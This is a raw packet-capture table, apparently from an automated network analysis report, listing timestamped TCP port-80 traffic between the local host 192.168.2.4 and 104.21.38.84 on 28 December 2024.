                                                                        Dec 28, 2024 20:43:56.889662027 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.936953068 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.937150002 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:57.056674004 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.056777000 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.126178026 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:57.247705936 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.247740984 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.247786999 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.465439081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.466928959 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:57.593172073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.806282997 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.806577921 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:57.926155090 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.926354885 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.948057890 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.094810009 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.201148033 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.329303980 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.333621025 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.352139950 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.352979898 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.459412098 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.478892088 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.478975058 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.479319096 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.479387045 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.479480982 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.601845026 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.672089100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.672282934 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.792587996 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.792623997 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.829238892 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.950942993 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.950957060 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.950964928 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.201597929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.206228971 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.326034069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.538660049 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.538830042 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.613854885 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.658360958 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.658467054 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.704210997 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.856158018 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.907322884 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.983308077 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.984014988 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.073123932 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.073951960 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.104677916 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.104731083 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.104912043 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.104978085 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.105099916 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.197197914 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.228478909 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.409724951 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.409931898 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.454277039 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.529905081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.529920101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.573914051 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.574023008 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.574050903 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.942364931 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.943289995 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.062808990 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.275568962 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.278292894 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.287153006 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.398580074 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.398709059 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.407339096 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.540999889 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.594819069 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.807503939 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.809144974 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.898741961 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.899471045 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.930134058 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.022979021 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.023040056 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.023381948 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.023433924 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.023562908 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.142896891 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.143187046 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.149739981 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.266881943 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.267043114 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.376167059 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.495784044 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.495794058 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.495804071 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.679475069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.680489063 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.801989079 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.014292955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.014561892 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.117609024 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.134313107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.134367943 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.172924042 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.356231928 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.407398939 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.500010967 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.520323038 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.521209002 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.594810009 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.647110939 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.647177935 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.647397995 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.647461891 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.647574902 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.710264921 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.710823059 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.771158934 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.830411911 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.001158953 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.042982101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.044490099 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.120944977 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.120989084 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.121033907 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.164127111 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.164211988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.590536118 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.592837095 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.713335037 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.736143112 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.782315016 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.925966978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.928540945 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.979186058 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.032304049 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.112338066 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.112345934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.305152893 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.305895090 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.425729990 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.425792933 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.425797939 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.425966978 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.425996065 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.461091995 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.462404013 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.545908928 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.582895041 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.782461882 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.795557022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.795722008 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.904731035 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.904740095 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.904756069 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.917284966 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.917294025 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.632049084 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.632666111 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.632925034 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.666804075 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.668435097 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.704226017 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.754815102 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.758754015 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.835927963 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.871613026 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.872179985 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.966998100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.968343973 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.993752003 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.993843079 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.994126081 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.994194984 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.994298935 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:07.093568087 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.093681097 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:22.360456944 CET4995980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:22.412003040 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:22.412122011 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:22.441435099 CET4995980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:22.442434072 CET4996380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:22.534660101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:22.534707069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:22.562438965 CET8049959104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:22.562484980 CET4995980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:22.562951088 CET8049963104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:22.563004971 CET4996380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:22.563133001 CET4996380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:22.682894945 CET8049963104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:22.907387018 CET4996380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:22.907486916 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:22.908811092 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:23.026937962 CET8049963104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.026947021 CET8049963104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.026957035 CET8049963104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.028276920 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.241199970 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.242223024 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:23.361727953 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.361861944 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.649723053 CET8049963104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.704216003 CET4996380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:23.774158001 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.777566910 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:23.896797895 CET8049963104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.897047043 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:23.938595057 CET4996380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.019540071 CET4996380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.020212889 CET4996880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.110316038 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.110457897 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.139955997 CET8049963104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.140022993 CET4996380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.140331030 CET8049968104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.140398026 CET4996880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.140518904 CET4996880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.230068922 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.230328083 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.259962082 CET8049968104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.485507011 CET4996880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.609062910 CET8049968104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.609198093 CET8049968104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.609246969 CET8049968104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.636394978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.637389898 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:24.759246111 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.972012997 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:24.974231005 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.093770027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.093816042 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.224467993 CET8049968104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.266707897 CET4996880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.458585024 CET8049968104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.499422073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.500061035 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.501085043 CET4996880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.577630997 CET4996880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.578269958 CET4997380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.620903015 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.697572947 CET8049968104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.697871923 CET8049973104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.697927952 CET4996880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.697952986 CET4997380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.698040962 CET4997380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.820611000 CET8049973104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.833612919 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.834217072 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:25.958738089 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:25.958797932 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.048006058 CET4997380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:26.167720079 CET8049973104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.167732000 CET8049973104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.167741060 CET8049973104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.370347023 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.370980024 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:26.490905046 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.703983068 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.704127073 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:26.823719978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.823745966 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:26.878330946 CET8049973104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.016700983 CET4997380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.133018970 CET8049973104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.204262972 CET4997380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.230865002 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.231936932 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.251878977 CET4997380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.252557993 CET4997880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.351403952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.371773958 CET8049973104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.371819973 CET4997380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.372068882 CET8049978104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.372124910 CET4997880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.372211933 CET4997880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.491674900 CET8049978104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.564487934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.564604044 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.684324026 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.684339046 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.719875097 CET4997880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:27.839684010 CET8049978104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.839693069 CET8049978104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:27.839754105 CET8049978104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.090209007 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.098141909 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:28.217644930 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.430452108 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.434508085 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:28.738899946 CET8049978104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.740020990 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.740144968 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.750888109 CET8049978104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.752394915 CET4997880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:28.874263048 CET4998180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:28.874264002 CET4997880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:28.994566917 CET8049981104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.994729042 CET8049978104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:28.994813919 CET4998180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:28.994813919 CET4997880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:28.994935989 CET4998180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:29.099944115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.100819111 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:29.114669085 CET8049981104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.220386982 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.344887972 CET4998180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:29.433562040 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.433712006 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:29.464643002 CET8049981104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.464739084 CET8049981104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.464818001 CET8049981104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.554651022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.554754019 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.961204052 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:29.961872101 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.081557035 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.126019955 CET8049981104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.205562115 CET4998180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.294718027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.298264027 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.368010998 CET8049981104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.419080019 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.419174910 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.484462023 CET4998180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.486159086 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.604377985 CET8049981104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.604449034 CET4998180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.605674982 CET8049987104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:30.606184006 CET4998780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:30.606257915 CET4998780192.168.2.4104.21.38.84
